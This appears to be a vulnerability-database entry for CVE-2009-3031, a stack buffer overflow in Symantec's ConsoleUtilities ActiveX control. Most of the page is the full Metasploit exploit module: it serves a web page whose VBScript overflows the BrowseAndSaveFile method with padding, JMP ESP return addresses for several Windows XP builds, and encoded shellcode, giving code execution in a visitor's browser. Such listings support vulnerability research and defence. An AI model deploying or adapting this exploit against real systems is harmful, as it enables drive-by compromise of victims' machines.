Lucene search
Symantec ConsoleUtilities ActiveX Control Buffer Overflow
Symantec ConsoleUtilities ActiveX Control Buffer Overflow. Exploits stack buffer overflow in Symantecs ConsoleUtilities, allowing arbitrary code execution
Show more
| Reporter | Title | Published | Views | Family All 23 |
|---|---|---|---|---|
 | CVE-2009-3031 | 3 Nov 200916:00 | – | cvelist |
 | Symantec ConsoleUtilities ActiveX Control Metasploit Exploit | 3 Nov 200900:00 | – | packetstorm |
 | Symantec ConsoleUtilities - ActiveX Buffer Overflow (Metasploit) | 2 Nov 200900:00 | – | exploitdb |
| Symantec ConsoleUtilities - ActiveX Control Buffer Overflow (Metasploit) | 11 Nov 201000:00 | – | exploitdb |
 | Symantec ConsoleUtilities - ActiveX Buffer Overflow (Metasploit) | 2 Nov 200900:00 | – | exploitpack |
 | Symmantec ConsoleUtilities | 2 Nov 200900:00 | – | seebug |
| Symantec ConsoleUtilities ActiveX Control Buffer | 3 Nov 200900:00 | – | seebug |
| Symantec Altiris产品ConsoleUtilities ActiveX控件栈溢出漏洞 | 3 Nov 200900:00 | – | seebug |
| Symantec ConsoleUtilities ActiveX Buffer Overflow | 2 Nov 200900:00 | – | seebug |
| Symantec Altiris ConsoleUtilities ActiveX控件缓冲区溢出漏洞 | 5 Nov 200900:00 | – | seebug |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Symantec ConsoleUtilities ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Symantecs ConsoleUtilities.
By sending an overly long string to the "BrowseAndSaveFile()" method located
in the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an attacker may be able to
execute arbitrary code
},
'License' => MSF_LICENSE,
'Author' => [ 'Nikolas Sotiriu (lofi)' ],
'References' =>
[
[ 'CVE', '2009-3031'],
[ 'OSVDB', '59597'],
[ 'BID', '36698'],
[ 'URL', 'http://sotiriu.de/adv/NSOADV-2009-001.txt' ],
[ 'URL', 'http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2009&suid=20091102_00' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP3 English', { 'Ret' => 0x7e47bcaf } ],
[ 'Windows XP SP2 Universal', { 'Ret' => 0x77d92acc } ], # USER32.dll JMP ESP
[ 'Windows XP SP2 Pro German', { 'Ret' => 0x77D5AF0A } ], # SHELL32.dll JMP ESP
[ 'Windows XP SP3 Pro German', { 'Ret' => 0x7E6830D7 } ], # SHELL32.dll JMP ESP
],
'DisclosureDate' => '2009-11-02',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Randomize variables
vname = rand_text_alpha(rand(20) + 1)
junk = rand_text_alpha(rand(20) + 1)
eip = rand_text_alpha(rand(20) + 1)
morejunk = rand_text_alpha(rand(20) + 1)
sc = rand_text_alpha(rand(20) + 1)
buf = rand_text_alpha(rand(20) + 1)
# Set RET and shellcode
ret = Rex::Text.to_unescape([target.ret].pack('V'))
shellcode = Rex::Text.to_unescape(p.encoded)
# Build the Site
content = %Q|
<html>
<object classid='clsid:B44D252D-98FC-4D5C-948C-BE868392A004' id='#{vname}'></object>
<script language='vbscript'>
#{junk}=String(310,"A")
#{eip}=unescape("#{ret}")
#{morejunk}=String(18, unescape("%u0041"))
#{sc}=unescape("#{shellcode}")
#{buf}=#{junk}+#{eip}+#{morejunk}+#{sc}
#{vname}.BrowseAndSaveFile "",#{buf},"","",""
</script>
</html>
|
print_status("Sending #{self.name}")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo02 Nov 2009 21:02Current
8.3High risk
Vulners AI Score8.3
CVSS29.3
EPSS0.76853